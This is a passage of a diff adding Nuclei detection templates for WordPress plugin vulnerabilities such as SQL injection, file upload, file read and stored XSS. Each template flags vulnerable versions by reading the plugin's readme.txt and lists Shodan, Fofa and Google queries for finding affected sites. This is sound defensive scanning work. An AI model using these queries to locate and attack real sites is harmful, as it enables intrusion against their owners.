Inclusion in versions up to, and including, 1.3.19. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1b2cf896-7cb8-4a1e-bd8c-4da339965138?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-53824 + metadata: + fofa-query: "wp-content/plugins/all-bootstrap-blocks/" + google-query: inurl:"/wp-content/plugins/all-bootstrap-blocks/" + shodan-query: 'vuln:CVE-2024-53824' + tags: cve,wordpress,wp-plugin,all-bootstrap-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/all-bootstrap-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "all-bootstrap-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.19') \ No newline at end of file diff --git a/poc/cve/CVE-2024-53826.yaml b/poc/cve/CVE-2024-53826.yaml new file mode 100644 index 0000000000..a504333f13 --- /dev/null +++ b/poc/cve/CVE-2024-53826.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-53826-e1607a5c14986b3d990b221c0149561b + +info: + name: > + WPCasa <= 1.2.13 - Insecure Direct Object Reference + author: topscoder + severity: medium + description: > + The WPCasa plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.2.13 due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to act on objects they shouldn't be able to manipulate. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5d1e5030-fb78-47da-b571-048b97c9ff9e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-53826 + metadata: + fofa-query: "wp-content/plugins/wpcasa/" + google-query: inurl:"/wp-content/plugins/wpcasa/" + shodan-query: 'vuln:CVE-2024-53826' + tags: cve,wordpress,wp-plugin,wpcasa,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpcasa/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpcasa" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.13') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54206.yaml b/poc/cve/CVE-2024-54206.yaml new file mode 100644 index 0000000000..e00ffd248e --- /dev/null +++ b/poc/cve/CVE-2024-54206.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54206-d592b86b797429244811af87aadde053 + +info: + name: > + Z-Downloads <= 1.11.7 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Z-Downloads plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.11.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aae94aa1-a7a9-43df-b958-4fcf0392335b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-54206 + metadata: + fofa-query: "wp-content/plugins/z-downloads/" + google-query: inurl:"/wp-content/plugins/z-downloads/" + shodan-query: 'vuln:CVE-2024-54206' + tags: cve,wordpress,wp-plugin,z-downloads,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/z-downloads/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "z-downloads" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.11.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54207.yaml b/poc/cve/CVE-2024-54207.yaml new file mode 100644 index 0000000000..63bf742181 --- /dev/null +++ b/poc/cve/CVE-2024-54207.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54207-6550e248932e2b5e412bf4389b4db0b2 + +info: + name: > + WordPress Auction Plugin <= 3.7 - Authenticated (Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WordPress Auction Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6c240829-0672-4ac2-b49a-2068a0a549f1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 5.5 + cve-id: CVE-2024-54207 + metadata: + fofa-query: "wp-content/plugins/wp-auctions/" + google-query: inurl:"/wp-content/plugins/wp-auctions/" + shodan-query: 'vuln:CVE-2024-54207' + tags: cve,wordpress,wp-plugin,wp-auctions,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-auctions/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-auctions" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54212.yaml b/poc/cve/CVE-2024-54212.yaml new file mode 100644 index 0000000000..8039acb1e2 --- /dev/null +++ b/poc/cve/CVE-2024-54212.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54212-d09821a4422849355cacdfed1659a677 + +info: + name: > + Magical Addons For Elementor <= 1.2.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Magical Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b421d80f-408e-4fb0-9894-b7e5707d8d5f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54212 + metadata: + fofa-query: "wp-content/plugins/magical-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/magical-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-54212' + tags: cve,wordpress,wp-plugin,magical-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/magical-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "magical-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54213.yaml b/poc/cve/CVE-2024-54213.yaml new file mode 100644 index 0000000000..174883d6b5 --- /dev/null +++ b/poc/cve/CVE-2024-54213.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54213-c849bc6412851fdfab9fa6a72e7286ff + +info: + name: > + WordPress Page Builder – Zion Builder <= 3.6.12 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WordPress Page Builder – Zion Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.6.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/870beaba-5294-4a77-89d1-8d5cf92974dc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54213 + metadata: + fofa-query: "wp-content/plugins/zionbuilder/" + google-query: inurl:"/wp-content/plugins/zionbuilder/" + shodan-query: 'vuln:CVE-2024-54213' + tags: cve,wordpress,wp-plugin,zionbuilder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zionbuilder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zionbuilder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.12') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54214.yaml b/poc/cve/CVE-2024-54214.yaml new file mode 100644 index 0000000000..60908bae6a --- /dev/null +++ b/poc/cve/CVE-2024-54214.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54214-62204c0e75824c81aacf42c7b2c3ef67 + +info: + name: > + Revy <= 1.18 - Unauthenticated Arbitrary File Upload + author: topscoder + severity: critical + description: > + The Revy plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.18. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6827dc47-669c-41de-8716-7932ce8e5259?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-54214 + metadata: + fofa-query: "wp-content/plugins/revy/" + google-query: inurl:"/wp-content/plugins/revy/" + shodan-query: 'vuln:CVE-2024-54214' + tags: cve,wordpress,wp-plugin,revy,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/revy/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "revy" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.18') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54215.yaml b/poc/cve/CVE-2024-54215.yaml new file mode 100644 index 0000000000..22a01df6c1 --- /dev/null +++ b/poc/cve/CVE-2024-54215.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54215-eb6c568774fac21c9e0fd876c8c18c48 + +info: + name: > + Revy <= 1.18 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The Revy plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.18 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/50192909-9351-4cf5-b578-f34be72aeda6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-54215 + metadata: + fofa-query: "wp-content/plugins/revy/" + google-query: inurl:"/wp-content/plugins/revy/" + shodan-query: 'vuln:CVE-2024-54215' + tags: cve,wordpress,wp-plugin,revy,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/revy/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "revy" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.18') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54216.yaml b/poc/cve/CVE-2024-54216.yaml new file mode 100644 index 0000000000..2045ba197c --- /dev/null +++ b/poc/cve/CVE-2024-54216.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54216-5024750a9504fe312f75e6f67ba9c71d + +info: + name: > + ARForms <= 6.4.1 - Directory Traversal to Authenticated (Subscriber+) Arbitrary File Read + author: topscoder + severity: low + description: > + The ARforms plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 6.4.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read arbitrary files on the server, which can expose DB credentials when the wp-config.php file is read. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0f02b258-d911-401e-8b32-57166d75bde7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.7 + cve-id: CVE-2024-54216 + metadata: + fofa-query: "wp-content/plugins/arforms/" + google-query: inurl:"/wp-content/plugins/arforms/" + shodan-query: 'vuln:CVE-2024-54216' + tags: cve,wordpress,wp-plugin,arforms,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arforms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arforms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54217.yaml b/poc/cve/CVE-2024-54217.yaml new file mode 100644 index 0000000000..371a7a3d70 --- /dev/null +++ b/poc/cve/CVE-2024-54217.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54217-313ad197c9d2d51af932f72d31a189fa + +info: + name: > + ARForms <= 6.4.1 - Missing Authorization to Plugin Settings Change + author: topscoder + severity: low + description: > + The ARforms plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check in all versions up to, and including, 6.4.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the plugin's settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d5d12ecc-862f-4ecd-9c7b-25dc557abb8d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2024-54217 + metadata: + fofa-query: "wp-content/plugins/arforms/" + google-query: inurl:"/wp-content/plugins/arforms/" + shodan-query: 'vuln:CVE-2024-54217' + tags: cve,wordpress,wp-plugin,arforms,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arforms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arforms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54218.yaml b/poc/cve/CVE-2024-54218.yaml new file mode 100644 index 0000000000..87fbb9380d --- /dev/null +++ b/poc/cve/CVE-2024-54218.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54218-06b4afe7f8ad8e989e59bbb3cdd989da + +info: + name: > + AIO Contact <= 2.8.1 - Missing Authorization + author: topscoder + severity: high + description: > + The AIO Contact plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.8.1. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d8f722f-79be-4df2-9f91-e759b8a73277?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L + cvss-score: 6.5 + cve-id: CVE-2024-54218 + metadata: + fofa-query: "wp-content/plugins/aio-contact/" + google-query: inurl:"/wp-content/plugins/aio-contact/" + shodan-query: 'vuln:CVE-2024-54218' + tags: cve,wordpress,wp-plugin,aio-contact,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/aio-contact/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "aio-contact" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54219.yaml b/poc/cve/CVE-2024-54219.yaml new file mode 100644 index 0000000000..ee5f19e6de --- /dev/null +++ b/poc/cve/CVE-2024-54219.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54219-0c95674ba25b17f5866c5401fb53b69f + +info: + name: > + AIO Contact <= 2.8.1 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The AIO Contact plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e4c7d179-9b65-48da-b92e-11fb0629653a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-54219 + metadata: + fofa-query: "wp-content/plugins/aio-contact/" + google-query: inurl:"/wp-content/plugins/aio-contact/" + shodan-query: 'vuln:CVE-2024-54219' + tags: cve,wordpress,wp-plugin,aio-contact,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/aio-contact/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "aio-contact" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54220.yaml b/poc/cve/CVE-2024-54220.yaml new file mode 100644 index 0000000000..d13efe5130 --- /dev/null +++ b/poc/cve/CVE-2024-54220.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54220-dabc3c346f24f802d453a828795d331c + +info: + name: > + FAT Services Booking <= 5.6 - Authenticated (Subscriber+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The FAT Services Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b03125e6-689b-46d7-8a39-3260d46fb17d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54220 + metadata: + fofa-query: "wp-content/plugins/fat-services-booking/" + google-query: inurl:"/wp-content/plugins/fat-services-booking/" + shodan-query: 'vuln:CVE-2024-54220' + tags: cve,wordpress,wp-plugin,fat-services-booking,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fat-services-booking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fat-services-booking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54221.yaml b/poc/cve/CVE-2024-54221.yaml new file mode 100644 index 0000000000..68a2869388 --- /dev/null +++ b/poc/cve/CVE-2024-54221.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54221-6ec2fd6753d862f4960591e64ef3b6c9 + +info: + name: > + FAT Services Booking <= 5.6 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The FAT Services Booking plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 5.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b988a8bb-0def-4469-8f97-d329967cb11b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cve-id: CVE-2024-54221 + metadata: + fofa-query: "wp-content/plugins/fat-services-booking/" + google-query: inurl:"/wp-content/plugins/fat-services-booking/" + shodan-query: 'vuln:CVE-2024-54221' + tags: cve,wordpress,wp-plugin,fat-services-booking,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fat-services-booking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fat-services-booking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54223.yaml b/poc/cve/CVE-2024-54223.yaml new file mode 100644 index 0000000000..e65181cf2a --- /dev/null +++ b/poc/cve/CVE-2024-54223.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54223-eb5a3cfa0572e6123bd603f96e9d1ae5 + +info: + name: > + ARForms Form Builder <= 1.7.1 - HTML Injection + author: topscoder + severity: medium + description: > + The Contact Form, Survey, Quiz & Popup Form Builder – ARForms plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 1.7.1. This is due to the plugin not properly sanitizing and escaping data. This makes it possible for unauthenticated attackers to inject HTML elements. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f800bc0-5b1b-43fa-a267-d8db444d0c2c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-54223 + metadata: + fofa-query: "wp-content/plugins/arforms-form-builder/" + google-query: inurl:"/wp-content/plugins/arforms-form-builder/" + shodan-query: 'vuln:CVE-2024-54223' + tags: cve,wordpress,wp-plugin,arforms-form-builder,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arforms-form-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arforms-form-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54224.yaml b/poc/cve/CVE-2024-54224.yaml new file mode 100644 index 0000000000..55b9eaff4b --- /dev/null +++ b/poc/cve/CVE-2024-54224.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54224-633e8c33e4210ddd571311b75b795b03 + +info: + name: > + ElementsReady Addons for Elementor <= 6.4.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The ElementsReady Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 6.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a33c0e7e-42d3-442e-886e-e0a71cdbf628?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54224 + metadata: + fofa-query: "wp-content/plugins/element-ready-lite/" + google-query: inurl:"/wp-content/plugins/element-ready-lite/" + shodan-query: 'vuln:CVE-2024-54224' + tags: cve,wordpress,wp-plugin,element-ready-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/element-ready-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "element-ready-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54225.yaml b/poc/cve/CVE-2024-54225.yaml new file mode 100644 index 0000000000..8b84f78595 --- /dev/null +++ b/poc/cve/CVE-2024-54225.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54225-865cf12d67ad4e2a12b4e760865df92d + +info: + name: > + Designer <= 1.3.3 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + The Designer plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.3.3. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/47a67db6-cc0d-47d2-a2c2-11b8c410f2fb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-54225 + metadata: + fofa-query: "wp-content/plugins/designer/" + google-query: inurl:"/wp-content/plugins/designer/" + shodan-query: 'vuln:CVE-2024-54225' + tags: cve,wordpress,wp-plugin,designer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/designer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "designer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54226.yaml b/poc/cve/CVE-2024-54226.yaml new file mode 100644 index 0000000000..e4101a3f0e --- /dev/null +++ b/poc/cve/CVE-2024-54226.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54226-c4753fa19fce4c8a27345324e7b382cb + +info: + name: > + Country Blocker <= 3.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Country Blocker plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for 